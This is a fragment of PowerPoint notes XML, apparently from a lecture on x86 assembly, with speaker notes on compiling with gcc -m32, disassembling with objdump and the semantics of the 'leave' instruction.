      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15170692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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12447738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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2159407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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1175328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F3E194-9CD8-5141-A084-FACF5FE3CE7A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029122" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029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76282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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5518914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DC0C6E-92FD-E543-A864-B05FD6DAFA38}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704514" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704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49144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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11809614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Segmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Fault!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>186</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10237065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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="712107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70919A-7999-1344-A77D-8550F76A0C90}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>188</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706562" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706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951061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A5C90E-F172-ED4A-9B27-405EC72B29A4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>189</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="707586" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7075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724501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0A232C-859C-7944-BBC3-4E45C70EADFE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708610" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7086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98384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3511EB-C2F5-A145-B335-3AB86E8010F6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>192</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709634" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709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368162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3511EB-C2F5-A145-B335-3AB86E8010F6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>193</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709634" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709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7587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0481D4-4C3B-774A-9C43-56765108CB42}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030146" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030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303058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0E3C41-3C8B-EF42-AF77-9C12A39B27A4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="710658" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="710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810565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345D5D-2BBA-8A4E-8E78-F565E6258773}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712706" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7127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936929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4398F7-9886-A24A-B54B-F2557141BB12}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713730" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7137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078043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E3A278-5DD2-8042-B4E4-70459F0B728B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>198</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716802" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716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64478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E3A278-5DD2-8042-B4E4-70459F0B728B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>202</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716802" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716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853243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E3A278-5DD2-8042-B4E4-70459F0B728B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>204</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716802" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716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689925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186F2D-A3A4-C746-B822-03656D89F2BB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>205</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718850" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718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01013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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>206</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5663076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B3B073-1E93-A848-867E-A6AEEA45BEF7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>232</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="720898" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="720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2968685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4099EF-3E8D-9742-97F2-E1FA441544DF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>233</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721922" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7219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4491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952140-418B-B94E-A94B-24468F1C4D8A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027074" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10270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862059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6E9F72-5832-AC4E-9B9A-D5D0A3C27AAA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>234</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="726018" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7260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0961156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048129-E60A-ED49-BD6F-F910058D55DC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>236</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="729090" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7290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232783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1F2342-7D86-474E-903B-2BF470BF4B50}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>237</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
